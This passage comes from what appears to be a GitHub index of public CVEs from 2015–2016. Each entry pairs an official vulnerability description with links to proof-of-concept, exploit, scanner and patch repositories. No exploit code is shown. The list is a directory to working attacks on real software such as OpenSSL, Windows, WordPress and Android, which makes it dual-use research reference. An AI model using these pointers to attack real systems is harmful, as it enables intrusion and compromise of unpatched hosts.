- [muzalam/FFMPEG-exploit](https://github.com/muzalam/FFMPEG-exploit)

### CVE-2016-10191 (2017-02-09)

Heap-based buffer overflow in libavformat/rtmppkt.c in FFmpeg before 2.8.10, 3.0.x before 3.0.5, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 allows remote attackers to execute arbitrary code by leveraging failure to check for RTMP packet size mismatches.

- [KaviDk/Heap-Over-Flow-with-CVE-2016-10191](https://github.com/KaviDk/Heap-Over-Flow-with-CVE-2016-10191)

### CVE-2016-10277 (2017-05-12)

An elevation of privilege vulnerability in the Motorola bootloader could enable a local malicious application to execute arbitrary code within the context of the bootloader. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-33840490.

- [alephsecurity/initroot](https://github.com/alephsecurity/initroot)
- [leosol/initroot](https://github.com/leosol/initroot)

### CVE-2016-10555 (2018-05-31)

Since "algorithm" isn't enforced in jwt.decode() in jwt-simple 0.3.0 and earlier, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants.

- [thepcn3rd/jwtToken-CVE-2016-10555](https://github.com/thepcn3rd/jwtToken-CVE-2016-10555)
- [CircuitSoul/poc-cve-2016-10555](https://github.com/CircuitSoul/poc-cve-2016-10555)
- [scent2d/PoC-CVE-2016-10555](https://github.com/scent2d/PoC-CVE-2016-10555)

### CVE-2016-10709 (2018-01-22)

pfSense before 2.3 allows remote authenticated users to execute arbitrary OS commands via a '|' character in the status_rrd_graph_img.php graph parameter, related to _rrd_graph_img.php.

- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)

### CVE-2016-10761 (2019-06-29)

Logitech Unifying devices before 2016-02-26 allow keystroke injection, bypassing encryption, aka MouseJack.

- [ISSAPolska/CVE-2016-10761](https://github.com/ISSAPolska/CVE-2016-10761)

### CVE-2016-10924 (2019-08-22)

The ebook-download plugin before 1.2 for WordPress has directory traversal.

- [rvizx/CVE-2016-10924](https://github.com/rvizx/CVE-2016-10924)
- [LGenAgul/Wordpress-ebook-CVE-2016-10924](https://github.com/LGenAgul/Wordpress-ebook-CVE-2016-10924)

### CVE-2016-10956 (2019-09-16)

The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.

- [p0dalirius/CVE-2016-10956-mail-masta](https://github.com/p0dalirius/CVE-2016-10956-mail-masta)
- [Hackhoven/wp-mail-masta-exploit](https://github.com/Hackhoven/wp-mail-masta-exploit)

### CVE-2016-10993 (2019-09-17)

The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter.

- [0xc4t/CVE-2016-10993](https://github.com/0xc4t/CVE-2016-10993)

### CVE-2016-20012 (2021-09-15)

OpenSSH through 8.7 allows remote attackers, who have a suspicion that a certain combination of username and public key is known to an SSH server, to test whether this suspicion is correct. This occurs because a challenge is sent only when that combination could be valid for a login session. NOTE: the vendor does not recognize user enumeration as a vulnerability for this product.

- [aztec-eagle/cve-2016-20012](https://github.com/aztec-eagle/cve-2016-20012)

### CVE-2016-1000027 (2020-01-02)

Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or may not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data.

- [artem-smotrakov/cve-2016-1000027-poc](https://github.com/artem-smotrakov/cve-2016-1000027-poc)
- [tina94happy/Spring-Web-5xx-Mitigated-version](https://github.com/tina94happy/Spring-Web-5xx-Mitigated-version)
- [yihtserns/spring-web-without-remoting](https://github.com/yihtserns/spring-web-without-remoting)

## 2015
### CVE-2015-0006 (2015-01-13)

The Network Location Awareness (NLA) service in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not perform mutual authentication to determine a domain connection, which allows remote attackers to trigger an unintended permissive configuration by spoofing DNS and LDAP responses on a local network, aka "NLA Security Feature Bypass Vulnerability."

- [bugch3ck/imposter](https://github.com/bugch3ck/imposter)

### CVE-2015-0057 (2015-02-11)

win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."

- [55-AA/CVE-2015-0057](https://github.com/55-AA/CVE-2015-0057)

### CVE-2015-0072 (2015-02-07)

Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 9 through 11 allows remote attackers to bypass the Same Origin Policy and inject arbitrary web script or HTML via vectors involving an IFRAME element that triggers a redirect, a second IFRAME element that does not trigger a redirect, and an eval of a WindowProxy object, aka "Universal XSS (UXSS)."

- [dbellavista/uxss-poc](https://github.com/dbellavista/uxss-poc)

### CVE-2015-0204 (2015-01-09)

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations.

- [felmoltor/FreakVulnChecker](https://github.com/felmoltor/FreakVulnChecker)
- [scottjpack/Freak-Scanner](https://github.com/scottjpack/Freak-Scanner)
- [AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script](https://github.com/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script)
- [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://github.com/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204)
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)

### CVE-2015-0205 (2015-01-09)

The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support.

- [saurabh2088/OpenSSL_1_0_1g_CVE-2015-0205](https://github.com/saurabh2088/OpenSSL_1_0_1g_CVE-2015-0205)

### CVE-2015-0231 (2015-01-27)

Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.

- [3xp10it/php_cve-2014-8142_cve-2015-0231](https://github.com/3xp10it/php_cve-2014-8142_cve-2015-0231)

### CVE-2015-0235 (2015-01-28)

Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."

- [fser/ghost-checker](https://github.com/fser/ghost-checker)
- [mikesplain/CVE-2015-0235-cookbook](https://github.com/mikesplain/CVE-2015-0235-cookbook)
- [aaronfay/CVE-2015-0235-test](https://github.com/aaronfay/CVE-2015-0235-test)
- [piyokango/ghost](https://github.com/piyokango/ghost)
- [mholzinger/CVE-2015-0235_GHOST](https://github.com/mholzinger/CVE-2015-0235_GHOST)
- [adherzog/ansible-CVE-2015-0235-GHOST](https://github.com/adherzog/ansible-CVE-2015-0235-GHOST)
- [favoretti/lenny-libc6](https://github.com/favoretti/lenny-libc6)
- [nickanderson/cfengine-CVE_2015_0235](https://github.com/nickanderson/cfengine-CVE_2015_0235)
- [koudaiii-archives/cookbook-update-glibc](https://github.com/koudaiii-archives/cookbook-update-glibc)
- [F88/ghostbusters15](https://github.com/F88/ghostbusters15)
- [tobyzxj/CVE-2015-0235](https://github.com/tobyzxj/CVE-2015-0235)
- [makelinux/CVE-2015-0235-workaround](https://github.com/makelinux/CVE-2015-0235-workaround)
- [arm13/ghost_exploit](https://github.com/arm13/ghost_exploit)
- [alanmeyer/CVE-glibc](https://github.com/alanmeyer/CVE-glibc)
- [1and1-serversupport/ghosttester](https://github.com/1and1-serversupport/ghosttester)
- [sUbc0ol/CVE-2015-0235](https://github.com/sUbc0ol/CVE-2015-0235)
- [chayim/GHOSTCHECK-cve-2015-0235](https://github.com/chayim/GHOSTCHECK-cve-2015-0235)
- [limkokholefork/GHOSTCHECK-cve-2015-0235](https://github.com/limkokholefork/GHOSTCHECK-cve-2015-0235)

### CVE-2015-0311 (2015-01-23)

Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.

- [jr64/CVE-2015-0311](https://github.com/jr64/CVE-2015-0311)

### CVE-2015-0313 (2015-02-02)

Use-after-free vulnerability in Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2015, a different vulnerability than CVE-2015-0315, CVE-2015-0320, and CVE-2015-0322.

- [SecurityObscurity/cve-2015-0313](https://github.com/SecurityObscurity/cve-2015-0313)

### CVE-2015-0345 (2015-04-15)

Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 10 before Update 16 and 11 before Update 5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

- [BishopFox/coldfusion-10-11-xss](https://github.com/BishopFox/coldfusion-10-11-xss)

### CVE-2015-0568 (2016-08-07)

Use-after-free vulnerability in the msm_set_crop function in drivers/media/video/msm/msm_camera.c in the MSM-Camera driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.

- [betalphafai/CVE-2015-0568](https://github.com/betalphafai/CVE-2015-0568)

### CVE-2015-0816 (2015-04-01)

Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 do not properly restrict resource: URLs, which makes it easier for remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging the ability to bypass the Same Origin Policy, as demonstrated by the resource: URL associated with PDF.js.

- [Afudadi/Firefox-35-37-Exploit](https://github.com/Afudadi/Firefox-35-37-Exploit)

### CVE-2015-1130 (2015-04-10)

The XPC implementation in Admin Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges via unspecified vectors.

- [Shmoopi/RootPipe-Demo](https://github.com/Shmoopi/RootPipe-Demo)
- [sideeffect42/RootPipeTester](https://github.com/sideeffect42/RootPipeTester)

### CVE-2015-1140 (2015-04-10)

Buffer overflow in IOHIDFamily in Apple OS X before 10.10.3 allows local users to gain privileges via unspecified vectors.

- [kpwn/vpwn](https://github.com/kpwn/vpwn)

### CVE-2015-1157 (2015-05-28)

CoreText in Apple iOS 8.x through 8.3 allows remote attackers to cause a denial of service (reboot and messaging disruption) via crafted Unicode text that is not properly handled during display truncation in the Notifications feature, as demonstrated by Arabic characters in (1) an SMS message or (2) a WhatsApp message.

- [perillamint/CVE-2015-1157](https://github.com/perillamint/CVE-2015-1157)

### CVE-2015-1318 (2015-04-17)

The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).

- [ScottyBauer/CVE-2015-1318](https://github.com/ScottyBauer/CVE-2015-1318)

### CVE-2015-1328 (2016-11-28)

The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.

- [SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328](https://github.com/SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328)
- [notlikethis/CVE-2015-1328](https://github.com/notlikethis/CVE-2015-1328)
- [elit3pwner/CVE-2015-1328-GoldenEye](https://github.com/elit3pwner/CVE-2015-1328-GoldenEye)
- [BlackFrog-hub/cve-2015-1328](https://github.com/BlackFrog-hub/cve-2015-1328)

### CVE-2015-1397 (2015-04-29)

SQL injection vulnerability in the getCsvFile function in the Mage_Adminhtml_Block_Widget_Grid class in Magento Community Edition (CE) 1.9.1.0 and Enterprise Edition (EE) 1.14.1.0 allows remote administrators to execute arbitrary SQL commands via the popularity[field_expr] parameter when the popularity[from] or popularity[to] parameter is set.

- [tmatejicek/CVE-2015-1397](https://github.com/tmatejicek/CVE-2015-1397)
- [WHOISshuvam/CVE-2015-1397](https://github.com/WHOISshuvam/CVE-2015-1397)
- [Wytchwulf/CVE-2015-1397-Magento-Shoplift](https://github.com/Wytchwulf/CVE-2015-1397-Magento-Shoplift)

### CVE-2015-1427 (2015-02-17)

The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.

- [t0kx/exploit-CVE-2015-1427](https://github.com/t0kx/exploit-CVE-2015-1427)
- [cved-sources/cve-2015-1427](https://github.com/cved-sources/cve-2015-1427)
- [cyberharsh/Groovy-scripting-engine-CVE-2015-1427](https://github.com/cyberharsh/Groovy-scripting-engine-CVE-2015-1427)
- [xpgdgit/CVE-2015-1427](https://github.com/xpgdgit/CVE-2015-1427)

### CVE-2015-1474 (2015-02-16)

Multiple integer overflows in the GraphicBuffer::unflatten function in platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0 allow attackers to gain privileges or cause a denial of service (memory corruption) via vectors that trigger a large number of (1) file descriptors or (2) integer values.

- [p1gl3t/CVE-2015-1474_poc](https://github.com/p1gl3t/CVE-2015-1474_poc)

### CVE-2015-1528 (2015-10-01)

Integer overflow in the native_handle_create function in libcutils/native_handle.c in Android before 5.1.1 LMY48M allows attackers to obtain a different application's privileges or cause a denial of service (Binder heap memory corruption) via a crafted application, aka internal bug 19334482.

- [secmob/PoCForCVE-2015-1528](https://github.com/secmob/PoCForCVE-2015-1528)
- [kanpol/PoCForCVE-2015-1528](https://github.com/kanpol/PoCForCVE-2015-1528)

### CVE-2015-1538 (2015-10-01)

Integer overflow in the SampleTable::setSampleToChunkParams function in SampleTable.cpp in libstagefright in Android before 5.1.1 LMY48I allows remote attackers to execute arbitrary code via crafted atoms in MP4 data that trigger an unchecked multiplication, aka internal bug 20139950, a related issue to CVE-2015-4496.

- [oguzhantopgul/cve-2015-1538-1](https://github.com/oguzhantopgul/cve-2015-1538-1)
- [renjithsasidharan/cve-2015-1538-1](https://github.com/renjithsasidharan/cve-2015-1538-1)
- [jduck/cve-2015-1538-1](https://github.com/jduck/cve-2015-1538-1)
- [niranjanshr13/Stagefright-cve-2015-1538-1](https://github.com/niranjanshr13/Stagefright-cve-2015-1538-1)
- [Tharana/Android-vulnerability-exploitation](https://github.com/Tharana/Android-vulnerability-exploitation)
- [Tharana/vulnerability-exploitation](https://github.com/Tharana/vulnerability-exploitation)

### CVE-2015-1560 (2015-07-14)

SQL injection vulnerability in the isUserAdmin function in include/common/common-Func.php in Centreon (formerly Merethis Centreon) 2.5.4 and earlier (fixed in Centreon web 2.7.0) allows remote attackers to execute arbitrary SQL commands via the sid parameter to include/common/XmlTree/GetXmlTree.php.

- [Iansus/Centreon-CVE-2015-1560_1561](https://github.com/Iansus/Centreon-CVE-2015-1560_1561)

### CVE-2015-1578 (2015-02-11)

Multiple open redirect vulnerabilities in u5CMS before 3.9.4 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the (1) pidvesa cookie to u5admin/pidvesa.php or (2) uri parameter to u5admin/meta2.php.

- [Zeppperoni/CVE-2015-1578](https://github.com/Zeppperoni/CVE-2015-1578)

### CVE-2015-1579 (2015-02-11)

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.

- [paralelo14/WordPressMassExploiter](https://github.com/paralelo14/WordPressMassExploiter)
- [paralelo14/CVE-2015-1579](https://github.com/paralelo14/CVE-2015-1579)

### CVE-2015-1592 (2015-02-19)

Movable Type Pro, Open Source, and Advanced before 5.2.12 and Pro and Advanced 6.0.x before 6.0.7 does not properly use the Perl Storable::thaw function, which allows remote attackers to include and execute arbitrary local Perl files and possibly execute arbitrary code via unspecified vectors.

- [lightsey/cve-2015-1592](https://github.com/lightsey/cve-2015-1592)

### CVE-2015-1635 (2015-04-14)

HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."

- [xPaw/HTTPsys](https://github.com/xPaw/HTTPsys)
- [Zx7ffa4512-Python/Project-CVE-2015-1635](https://github.com/Zx7ffa4512-Python/Project-CVE-2015-1635)
- [technion/erlvulnscan](https://github.com/technion/erlvulnscan)
- [wiredaem0n/chk-ms15-034](https://github.com/wiredaem0n/chk-ms15-034)
- [u0pattern/Remove-IIS-RIIS](https://github.com/u0pattern/Remove-IIS-RIIS)
- [bongbongco/MS15-034](https://github.com/bongbongco/MS15-034)
- [aedoo/CVE-2015-1635-POC](https://github.com/aedoo/CVE-2015-1635-POC)
- [limkokholefork/CVE-2015-1635](https://github.com/limkokholefork/CVE-2015-1635)
- [h3xcr4ck3r/CVE-2015-1635-POC](https://github.com/h3xcr4ck3r/CVE-2015-1635-POC)
- [h3xcr4ck3r/CVE-2015-1635](https://github.com/h3xcr4ck3r/CVE-2015-1635)
- [w01ke/CVE-2015-1635-POC](https://github.com/w01ke/CVE-2015-1635-POC)
- [SkinAir/ms15-034-Scan](https://github.com/SkinAir/ms15-034-Scan)
- [Cappricio-Securities/CVE-2015-1635](https://github.com/Cappricio-Securities/CVE-2015-1635)

### CVE-2015-1641 (2015-04-14)

Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1 allow remote attackers to execute arbitrary code via a crafted RTF document, aka "Microsoft Office Memory Corruption Vulnerability."

- [Cyberclues/rtf_exploit_extractor](https://github.com/Cyberclues/rtf_exploit_extractor)

### CVE-2015-1701 (2015-04-21)

Win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in April 2015, aka "Win32k Elevation of Privilege Vulnerability."

- [hfiref0x/CVE-2015-1701](https://github.com/hfiref0x/CVE-2015-1701)
- [Anonymous-Family/CVE-2015-1701](https://github.com/Anonymous-Family/CVE-2015-1701)
- [Anonymous-Family/CVE-2015-1701-download](https://github.com/Anonymous-Family/CVE-2015-1701-download)

### CVE-2015-1769 (2015-08-15)

Mount Manager in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 mishandles symlinks, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Mount Manager Elevation of Privilege Vulnerability."

- [int0/CVE-2015-1769](https://github.com/int0/CVE-2015-1769)

### CVE-2015-1788 (2015-06-12)

The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.

- [pazhanivel07/OpenSSL_1_0_1g_CVE-2015-1788](https://github.com/pazhanivel07/OpenSSL_1_0_1g_CVE-2015-1788)

### CVE-2015-1790 (2015-06-12)

The PKCS7_dataDecode function in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1790](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1790)

### CVE-2015-1791 (2015-06-12)

Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1791](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1791)

### CVE-2015-1792 (2015-06-12)

The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1792](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1792)

### CVE-2015-1805 (2015-08-08)

The (1) pipe_read and (2) pipe_write implementations in fs/pipe.c in the Linux kernel before 3.16 do not properly consider the side effects of failed __copy_to_user_inatomic and __copy_from_user_inatomic calls, which allows local users to cause a denial of service (system crash) or possibly gain privileges via a crafted application, aka an "I/O vector array overrun."

- [panyu6325/CVE-2015-1805](https://github.com/panyu6325/CVE-2015-1805)
- [dosomder/iovyroot](https://github.com/dosomder/iovyroot)
- [FloatingGuy/cve-2015-1805](https://github.com/FloatingGuy/cve-2015-1805)
- [mobilelinux/iovy_root_research](https://github.com/mobilelinux/iovy_root_research)
- [ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805](https://github.com/ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805)

### CVE-2015-1855 (2019-11-29)

verify_certificate_identity in the OpenSSL extension in Ruby before 2.0.0 patchlevel 645, 2.1.x before 2.1.6, and 2.2.x before 2.2.2 does not properly validate hostnames, which allows remote attackers to spoof servers via vectors related to (1) multiple wildcards, (2) wildcards in IDNA names, (3) case sensitivity, and (4) non-ASCII characters.

- [vpereira/CVE-2015-1855](https://github.com/vpereira/CVE-2015-1855)

### CVE-2015-1986 (2015-06-30)

The server in IBM Tivoli Storage Manager FastBack 6.1 before 6.1.12 allows remote attackers to execute arbitrary commands via unspecified vectors, a different vulnerability than CVE-2015-1938.

- [3t3rn4lv01d/CVE-2015-1986](https://github.com/3t3rn4lv01d/CVE-2015-1986)

### CVE-2015-2153 (2015-03-24)

The rpki_rtr_pdu_print function in print-rpki-rtr.c in the TCP printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read or write and crash) via a crafted header length in an RPKI-RTR Protocol Data Unit (PDU).

- [arntsonl/CVE-2015-2153](https://github.com/arntsonl/CVE-2015-2153)

### CVE-2015-2166 (2015-04-06)

Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.

- [K3ysTr0K3R/CVE-2015-2166-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2015-2166-EXPLOIT)

### CVE-2015-2208 (2015-03-12)

The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter.

- [ptantiku/cve-2015-2208](https://github.com/ptantiku/cve-2015-2208)

### CVE-2015-2231
- [rednaga/adups-get-super-serial](https://github.com/rednaga/adups-get-super-serial)

### CVE-2015-2291 (2017-08-09)

(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allow local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.

- [Tare05/Intel-CVE-2015-2291](https://github.com/Tare05/Intel-CVE-2015-2291)
- [gmh5225/CVE-2015-2291](https://github.com/gmh5225/CVE-2015-2291)

### CVE-2015-2315 (2015-03-17)

Cross-site scripting (XSS) vulnerability in the WPML plugin before 3.1.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the target parameter in a reminder_popup action to the default URI.

- [weidongl74/cve-2015-2315-report](https://github.com/weidongl74/cve-2015-2315-report)

### CVE-2015-2546 (2015-09-09)

The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT Gold and 8.1, and Windows 10 allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Elevation of Privilege Vulnerability," a different vulnerability than CVE-2015-2511, CVE-2015-2517, and CVE-2015-2518.

- [k0keoyo/CVE-2015-2546-Exploit](https://github.com/k0keoyo/CVE-2015-2546-Exploit)

### CVE-2015-2794 (2017-02-06)

The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.

- [styx00/DNN_CVE-2015-2794](https://github.com/styx00/DNN_CVE-2015-2794)
- [wilsc0w/CVE-2015-2794-finder](https://github.com/wilsc0w/CVE-2015-2794-finder)

### CVE-2015-2900 (2015-10-29)

The AddUserFinding add_userfinding2 function in Medicomp MEDCIN Engine before 2.22.20153.226 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted packet on port 8190.

- [securifera/CVE-2015-2900-Exploit](https://github.com/securifera/CVE-2015-2900-Exploit)

### CVE-2015-2925 (2015-11-16)

The prepend_path function in fs/dcache.c in the Linux kernel before 4.2.4 does not properly handle rename actions inside a bind mount, which allows local users to bypass an intended container protection mechanism by renaming a directory, related to a "double-chroot attack."

- [Kagami/docker_cve-2015-2925](https://github.com/Kagami/docker_cve-2015-2925)

### CVE-2015-3043 (2015-04-14)

Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in April 2015, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3042.

- [whitehairman/Exploit](https://github.com/whitehairman/Exploit)

### CVE-2015-3073 (2015-05-13)

Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X allow attackers to bypass intended restrictions on JavaScript API execution via unspecified vectors, a different vulnerability than CVE-2015-3060, CVE-2015-3061, CVE-2015-3062, CVE-2015-3063, CVE-2015-3064, CVE-2015-3065, CVE-2015-3066, CVE-2015-3067, CVE-2015-3068, CVE-2015-3069, CVE-2015-3071, CVE-2015-3072, and CVE-2015-3074.

- [reigningshells/CVE-2015-3073](https://github.com/reigningshells/CVE-2015-3073)

### CVE-2015-3090 (2015-05-13)

Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3078, CVE-2015-3089, and CVE-2015-3093.

- [Xattam1/Adobe-Flash-Exploits_17-18](https://github.com/Xattam1/Adobe-Flash-Exploits_17-18)

### CVE-2015-3145 (2015-04-24)

The sanitize_cookie_path function in cURL and libcurl 7.31.0 through 7.41.0 does not properly calculate an index, which allows remote attackers to cause a denial of service (out-of-bounds write and crash) or possibly have other unspecified impact via a cookie path containing only a double-quote character.

- [serz999/CVE-2015-3145](https://github.com/serz999/CVE-2015-3145)

### CVE-2015-3152 (2016-05-16)

Oracle MySQL before 5.7.3, Oracle MySQL Connector/C (aka libmysqlclient) before 6.1.3, and MariaDB before 5.5.44 use the --ssl option to mean that SSL is optional, which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, aka a "BACKRONYM" attack.

- [duo-labs/mysslstrip](https://github.com/duo-labs/mysslstrip)

### CVE-2015-3194 (2015-12-06)

crypto/rsa/rsa_ameth.c in OpenSSL 1.0.1 before 1.0.1q and 1.0.2 before 1.0.2e allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an RSA PSS ASN.1 signature that lacks a mask generation function parameter.

- [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3194](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3194)

